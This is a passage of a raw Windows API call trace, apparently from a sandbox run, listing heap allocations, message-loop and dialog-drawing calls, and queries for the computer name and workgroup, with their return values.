Flags=0x0, Size=0x20) returned 0xee6818 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a70 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ad8 | out: hHeap=0xcc0000) returned 1 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a70 | out: hHeap=0xcc0000) returned 1 [0273.522] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6840 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a70 [0273.523] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ad8 | out: hHeap=0xcc0000) returned 1 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6868 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79838 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a80 [0273.523] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79838 | out: hHeap=0xcc0000) returned 1 [0273.523] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a80 | out: hHeap=0xcc0000) returned 1 [0273.523] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.523] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6890 [0273.524] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79838 [0273.554] SendMessageW (hWnd=0x70166, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7090 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32fd8 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6fd0 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf61de8 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33008 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7060 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f40 | out: hHeap=0xcc0000) returned 1 [0273.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1fd48 | out: hHeap=0xcc0000) returned 1 [0273.554] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.561] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x8deb50, BufferType=0x8deb68 | out: lpNameBuffer=0x8deb50*="WORKGROUP", BufferType=0x8deb68) returned 0x0 [0273.572] NetApiBufferSize (in: Buffer=0xeebaa0, ByteCount=0x8de500 | out: ByteCount=0x8de500) returned 0x0 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbab8 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c08 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9340 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33058 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb9b0 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7150 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb860 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb30 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f40 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7078 | out: hHeap=0xcc0000) returned 1 [0273.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1fdc0 | out: hHeap=0xcc0000) returned 1 [0273.583] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.591] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x8deb50, BufferType=0x8deb68 | out: lpNameBuffer=0x8deb50*="WORKGROUP", BufferType=0x8deb68) returned 0x0 [0273.600] NetApiBufferSize (in: Buffer=0xeebaa0, ByteCount=0x8de500 | out: ByteCount=0x8de500) returned 0x0 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ae8 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x214) returned 0xd07158 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb770 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb728 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb740 [0273.600] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ab8 [0273.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb740 | out: hHeap=0xcc0000) returned 1 [0273.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb728 | out: hHeap=0xcc0000) returned 1 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb728 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb740 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ab8 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb740 | out: hHeap=0xcc0000) returned 1 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb740 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6f8 [0273.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ab8 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6f8 | out: hHeap=0xcc0000) returned 1 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0273.601] FreeLibrary (hLibModule=0x74490000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ac8 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf202c0 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbaa0 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33af8 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9310 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb60 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb848 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb18 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9400 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed93d0 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb878 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb48 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba70 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9460 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba28 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20298 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b08 | out: hHeap=0xcc0000) returned 1 [0273.605] PeekMessageW (in: lpMsg=0x8deb64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8deb64) returned 0 [0273.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b08 [0273.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd075a8 [0273.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33af8 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd075a8 | out: hHeap=0xcc0000) returned 1 [0273.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33af8 | out: hHeap=0xcc0000) returned 1 [0273.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33af8 [0273.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23468 [0273.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ac8 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ac8 | out: hHeap=0xcc0000) returned 1 [0273.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ac8 [0273.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23408 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ac8 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23408 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23468 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33af8 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b08 | out: hHeap=0xcc0000) returned 1 [0273.606] PeekMessageW (in: lpMsg=0x8deb64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8deb64) returned 0 [0273.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b08 [0273.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33af8 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33af8 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b08 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4668 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb9f8 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b28 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20248 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb728 | out: hHeap=0xcc0000) returned 1 [0273.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb740 | out: hHeap=0xcc0000) returned 1 [0273.617] GetComputerNameW (in: lpBuffer=0x8df320, nSize=0x8df63c | out: lpBuffer="XDUWTFONO", nSize=0x8df63c) returned 1 [0273.618] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb9f8 [0273.618] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20270 [0273.618] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33cb8 [0273.660] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.660] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.660] NtdllDialogWndProc_W () returned 0x0 [0273.689] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.689] NtdllDialogWndProc_W () returned 0x0 [0273.690] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.690] NtdllDialogWndProc_W () returned 0x0 [0273.690] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.690] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.690] NtdllDialogWndProc_W () returned 0x0 [0273.691] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.691] NtdllDialogWndProc_W () returned 0x0 [0273.691] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.691] NtdllDialogWndProc_W () returned 0x0 [0273.692] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.692] NtdllDialogWndProc_W () returned 0x0 [0273.694] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.694] NtdllDialogWndProc_W () returned 0x1 [0273.694] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.694] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.694] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.694] SetBkColor (hdc=0xc80101b7, color=0xf0f0f0) returned 0xffffff [0273.694] CreateSolidBrush (color=0xf0f0f0) returned 0x271006da [0273.694] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb8d8 [0273.694] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb908 [0273.696] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.696] NtdllDialogWndProc_W () returned 0x0 [0273.697] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.697] NtdllDialogWndProc_W () returned 0x0 [0273.700] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.700] NtdllDialogWndProc_W () returned 0x0 [0273.702] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.702] NtdllDialogWndProc_W () returned 0x1 [0273.702] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.702] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.703] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.703] SetBkColor (hdc=0xc80101b7, color=0xf0f0f0) returned 0xf0f0f0 [0273.704] GetForegroundWindow () returned 0xc0170 [0273.704] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb950 | out: hHeap=0xcc0000) returned 1 [0273.704] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20270 | out: hHeap=0xcc0000) returned 1 [0273.704] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.704] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.704] NtdllDialogWndProc_W () returned 0x0 [0273.704] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.704] NtdllDialogWndProc_W () returned 0x0 [0273.704] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.704] NtdllDialogWndProc_W () returned 0x0 [0273.705] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.705] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0273.705] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.705] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.705] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.705] NtdllDialogWndProc_W () returned 0x0 [0273.706] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.706] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.706] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.706] NtdllDialogWndProc_W () returned 0x0 [0273.706] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.706] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.706] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.706] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.706] BeginPaint (in: hWnd=0xc0170, lpPaint=0x8df7f8 | out: lpPaint=0x8df7f8) returned 0xc80101b7 [0273.706] EndPaint (hWnd=0xc0170, lpPaint=0x8df7f8) returned 1 [0273.706] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.706] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] NtdllDialogWndProc_W () returned 0x1 [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.707] SetBkColor (hdc=0x610106f8, color=0xf0f0f0) returned 0xffffff [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] NtdllDialogWndProc_W () returned 0x0 [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.707] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.707] SetBkColor (hdc=0x610106f8, color=0xf0f0f0) returned 0xf0f0f0 [0273.708] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.708] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.708] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0273.708] NtdllDialogWndProc_W () returned 0x0 [0273.708] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.708] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.708] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0273.708] NtdllDialogWndProc_W () returned 0x0 [0273.708] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.708] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.709] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.709] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.709] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.709] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.709] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.709] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0273.709] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0273.709] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.709] NtdllDialogWndProc_W () returned 0x1 [0273.709] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.709] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.709] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.709] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0x0 [0273.712] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.712] NtdllDialogWndProc_W () returned 0x0 [0273.713] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.713] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.713] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.713] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.713] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.713] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0273.713] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0273.714] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.714] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.714] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.714] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.714] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.714] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0273.714] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.714] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.714] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.714] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.714] GetWindowLongW (hWnd=0x70166, nIndex=-21) returned 4 [0273.714] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.714] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0273.714] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.720] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.720] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.720] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.720] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.720] GetWindowLongW (hWnd=0xd0164, nIndex=-21) returned 5 [0273.720] GetWindowLongW (hWnd=0xd0164, nIndex=-21) returned 5 [0273.720] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.720] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.720] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0273.723] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.723] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.723] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.723] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.723] GetWindowLongW (hWnd=0x800a2, nIndex=-21) returned 6 [0273.723] GetWindowLongW (hWnd=0x800a2, nIndex=-21) returned 6 [0273.723] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.723] GetWindowLongW (hWnd=0x800a2, nIndex=-16) returned 1342242944 [0273.723] GetSysColor (nIndex=5) returned 0xffffff [0273.723] GetSysColor (nIndex=8) returned 0x0 [0273.723] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0273.723] SetBkColor (hdc=0x270101c5, color=0xffffff) returned 0xffffff [0273.723] CreateSolidBrush (color=0xffffff) returned 0xffffffff90100788 [0273.723] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb950 [0273.723] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb920 [0273.724] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.724] NtdllDialogWndProc_W () returned 0x1 [0273.724] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.724] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.724] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.724] SetBkColor (hdc=0x530107ac, color=0xf0f0f0) returned 0xffffff [0273.724] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.724] NtdllDialogWndProc_W () returned 0x0 [0273.725] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.725] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.725] GetWindowLongW (hWnd=0x800a2, nIndex=-21) returned 6 [0273.725] GetWindowLongW (hWnd=0x800a2, nIndex=-21) returned 6 [0273.725] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.725] GetWindowLongW (hWnd=0x800a2, nIndex=-16) returned 1342242944 [0273.725] GetSysColor (nIndex=5) returned 0xffffff [0273.725] GetSysColor (nIndex=8) returned 0x0 [0273.725] SetTextColor (hdc=0x540107ac, color=0x0) returned 0x0 [0273.725] SetBkColor (hdc=0x540107ac, color=0xffffff) returned 0xffffff [0273.730] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.730] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] NtdllDialogWndProc_W () returned 0x1 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetWindowLongW 